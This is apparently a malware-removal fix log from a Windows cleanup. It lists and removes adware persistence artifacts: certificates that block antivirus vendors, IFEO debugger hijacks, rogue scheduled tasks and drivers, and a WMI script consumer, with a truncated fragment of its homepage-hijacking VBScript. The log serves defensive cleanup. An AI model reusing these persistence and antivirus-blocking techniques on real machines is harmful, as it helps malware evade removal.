HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [Windows] => C:\Users\Public\Public Documents\Windows Movie Player\player.exe [675840 2008-12-07] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {504f5f88-f0b9-11e4-bf35-b4b52f8204d5} - "F:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {c6bcc6da-e434-11e3-be7e-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {e1c8640c-1171-11e4-beab-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy-x32: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION
Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION
Task: {1BFF6763-5417-42C6-A8B9-23DE8C0E01B0} - System32\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6 => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {51C8E8CF-5601-4895-BA14-1F91249AF735} - System32\Tasks\BrickEnforcer-S-1910914952 => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exe <==== ATTENTION
Task: {561B96D9-0C13-46D1-B48C-11B450EDE068} - System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\Program Files (x86)\Call of Duty"
Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION
Task: {7E3BD6D3-90C4-4768-B8A8-7AB6AC090F1F} - System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A} => C:\WINDOWS\system32\pcalua.exe -a D:\Autorun.exe -d D:\
Task: {87D6BD84-A209-4EE6-A6AD-3F9E410A5AFA} - System32\Tasks\{A1783EA8-E469-4557-B18F-2087FFAF942E} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System\bia.exe" -d "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System"
Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION
Task: {BA2D6EF1-2E43-41F4-8F05-06D5FD4FE079} - System32\Tasks\{48E5C962-97D2-4C1B-8B42-380F8CFBD54D} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Activision\Spider-Man 2\System\Webhead[old].exe" -d "C:\Program Files (x86)\Activision\Spider-Man 2\System"
Task: {C3753944-E90D-499B-9533-7FC6F108AC80} - System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A} => C:\WINDOWS\system32\pcalua.exe -a I:\Launch.exe -d I:\
Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION
Task: {EC594B90-2D56-4C16-A5E2-F562DBA81135} - System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\PROGRA~2\Call of Duty"
Task: C:\WINDOWS\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6.job => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\BrickEnforcer-S-1910914952.job => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exeV/schedule /profile c:\programdata\trusted publisher\premiumaugmenter\1910914952.ini <==== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {03A35688-219B-40F5-AFC8-7A437C49429D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {09F1332C-51BE-4C3D-9F77-6336BC0ECF20} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0C2DE69F-5155-4FD6-A5F4-7EDDA54CF7C7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0E29DD56-64FC-413E-8F41-5F0535696FDF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1109940C-95FA-4E03-A2F2-A28897FB6766} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14B5528E-A863-4962-9F60-35569D3A1D1C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14E9506E-6D62-4741-9179-44D48CFCD8D2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {16EF7AD8-DB44-443A-BCFB-D50A947D99BF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {171CF743-D4F4-4CB1-87BC-7E191F913FC3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1B8A65AA-BDF6-470E-B140-356633DFA09A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {204DFD3C-EB06-4456-83C5-CCBF1ED48440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2547CEC6-613C-43E4-A593-CC2069084999} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {25BA9130-4A0D-46EF-ADB0-73F1C655CF45} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {26A469EA-AA26-4747-81C6-0E1DBEEB2C13} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C587672-09A4-4A45-9B9B-58A9FE436EF8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C9084D8-A408-42AB-8E29-6BD020D24440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2EC50B37-C4AD-44AB-BA23-D5AAD093C41A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33A41A2E-33C2-4E13-BE84-3559916A6889} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34109212-EC73-44D1-BA1D-E129C381F861} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {3421CDC7-4296-4974-A5F7-B5684D8919B1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34525437-CA15-4A19-9417-26E92976BC39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {365B2F7A-0D50-4476-B107-CB48F4658122} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {380E9DF0-D28C-49C4-BEC9-B7F5FC964664} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {43B1BB36-70BE-4F59-BCA6-F429FCF4137C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45B33A18-F60E-4AE0-9CAC-5967F87CE983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45D166C3-631A-473D-8730-D0ADFD3A6F11} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {464C8606-EF57-4BE1-9060-3966C4EB5C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {4D856560-95D3-4C63-A1AA-AD9802529D26} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5949EADF-9F7D-4C65-8677-313ED03A8983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5E7721A4-8B1A-422D-A170-9A7B384FB535} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6150EBBB-6B17-4DD1-8E8C-3FFBF198E57A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {61DCF235-11FE-42E4-B3A5-9777503B4BA7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {659202E6-50F9-46C7-A428-5F75DB77AF0B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {666C57AA-3376-458E-A26F-708CC9B1FF6D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {69A0C7C2-B8EB-43F1-8C7D-BEDD21F3DB0E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6CA1EBCC-3860-4C12-9471-FEB4058AE6F5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6E2F5E9C-61D5-490B-BE27-DB2989EC9181} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {726310B3-DC05-482A-8873-5CD3627CADFC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {72CDA94A-2548-4F40-B7D2-280600756A39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {74934A3E-ACD6-4B9E-9C4C-C78415A9B457} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {873D163A-C7EE-486E-AD02-F14AB4F425EE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E2BFB58-D681-41BD-A2C8-CA15440D1EBF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E9D7148-305D-4F6D-A505-EBFB69404960} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8EE27882-ACAA-4340-AEA5-719145283051} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {94700D82-D8C1-42F7-959E-CAD9A16ADBAE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {97CB2411-D33F-411A-9813-127915E7C4E2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {9A5A4683-6234-4E10-8AF3-E4FA491D4EB3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A19F8F23-6424-4131-AE98-D1DACF4876CA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A3B40275-870B-498B-BD19-B5702E8B61A2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A810E43A-313B-4571-8D1D-6DEC89C6B1D7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9689D8D-DD63-4900-BD1D-9E6F8E7D26DF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9AFD5C7-DB69-4A9D-BF1A-8B33473351A4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AB73B2ED-F705-4656-9490-B2C6B2AEB6C6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AEBA8DD8-21D0-4DB6-A4F2-B4C5569260CA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AFD30DD4-F70E-4D36-BD50-FB5DA3AAEECF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B37AD013-C2D0-40F3-97D9-0472349E9C44} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B3D3A37C-4613-432E-8E3A-53E589157C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B6CA1B24-2418-4737-BB1A-6AB0CC0DF5AC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B71E823F-B4CC-4FB0-A8CC-DC505018DC1E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B9A6127D-16DE-481F-B9CA-4B397968F86A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA398AD4-309C-4915-9C6C-60140565F949} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA7DE47C-7957-4F39-85B5-BDADF2C1F23D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BF82F267-1D54-46D3-B76F-22D6A302F0EB} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BFE3BE80-727C-44AB-99DE-BAF4905AD5F9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C0095A98-BEAC-4C7D-89CD-23EDC7F1B0C1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C5FCA41F-794E-418D-B3AE-C5D2A9AB42A9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C6404912-B3FD-49D2-A88E-B88706C2E34A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CBE76AAC-7419-4CDE-98F3-48926A7E9121} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CC0BD598-A1C5-475E-AEB4-9A0CC3C53476} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CEDE0664-DEDC-4FA7-A393-3A2258C3D6A5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CFD8262B-801B-4471-B023-D1EA7C06C2B6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D0FAF6B0-BE3C-4C6D-B8BD-E307B77D2678} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D46AAFD7-49B7-4EDA-8081-F4ED3B3B5580} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E13E38A8-753A-4FD1-904A-066F681EDC1F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E6138BC0-A1E9-47D4-B000-FA1B4F043F92} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E8D0F6D5-572F-4F61-A09D-85D1CF0BA2FA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EBF29334-C208-4510-9CA2-4E7D84F02AB4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EF0BA1F2-5C7B-4FC4-B685-50C92BCD1FC4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F05B18BC-48EC-4676-A4EF-2B0779FBC7C8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F068E404-672E-429C-A601-117CA8E6F64B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F08DC883-0E75-4743-926F-07C2C076133F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {FBFB7078-3DAC-4B24-8CF6-2B36D1202F93} URL =
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\GQD9zH3G.default\Profiles\GQD9zH3G.default [not found] <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe <==== ATTENTION
R1 WiserIso; C:\WINDOWS\System32\Drivers\vcdrom.sys [25432 2016-12-27] (ć·±ĺśłĺ¸‚çŚ«ĺ“ç˝‘ç»śç§‘ćŠ€ĺŹ‘ĺ±•ćś‰é™ĺ…¬ĺŹ¸ -> ) <==== ATTENTION
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
S1 JszipProtect; \??\C:\Program Files (x86)\Maoha\JiSuZip\JsZipProtect64.sys [X] <==== ATTENTION
C:\WINDOWS\LastGood.Tmp
C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
C:\WINDOWS\System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F}
C:\WINDOWS\System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC}
C:\WINDOWS\System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A}
C:\WINDOWS\System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A}
C:\ProgramData\fnnegffbdniflckhmjifljomfnnjhhgd
C:\Users\Radim\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

EmptyTemp:
End
*****************

Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{E080595E-3381-11E7-A376-64006A5CFC23}" => removed successfully
HKLM\Software\Classes\CLSID\{E080595E-3381-11E7-A376-64006A5CFC23} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\CLVDShellExt => removed successfully
HKLM\Software\Classes\CLSID\{3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\JsZipShlExt => removed successfully
HKLM\Software\Classes\CLSID\{5C551008-A347-4DB3-AF48-014076FD2B46} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\JZContextMenuExt => removed successfully
HKLM\Software\Classes\CLSID\{5C551008-A347-4DB3-AF48-014076FD2B46} => not found
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\CLVDShellExt => removed successfully
HKLM\Software\Classes\CLSID\{3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => not found
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\JsZipShlExt => removed successfully
HKLM\Software\Classes\CLSID\{5C551008-A347-4DB3-AF48-014076FD2B46} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\JsZipShlExt => removed successfully
HKLM\Software\Classes\CLSID\{5C551008-A347-4DB3-AF48-014076FD2B46} => not found
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\CLVDShellExt => not found
HKLM\Software\Classes\CLSID\{3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => not found
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\JsZipShlExt => not found
HKLM\Software\Classes\CLSID\{5C551008-A347-4DB3-AF48-014076FD2B46} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\JsZipShlExt => not found
HKLM\Software\Classes\CLSID\{5C551008-A347-4DB3-AF48-014076FD2B46} => not found
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => not found
"\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\"" => removed successfully
"SethomePage Interval Timer" => removed successfully
"SethomePage Interval Timer" => not found
"EventFilter sethomePage2" => removed successfully
Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (the data entry has 2410 more characters).] <==== ATTENTION => Error: No automatic fix found for this entry.
HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName2 -> ndptsp.tsp (No File) => Error: No automatic fix found for this entry.
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => could not remove, key could be protected
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => could not remove, key could be protected
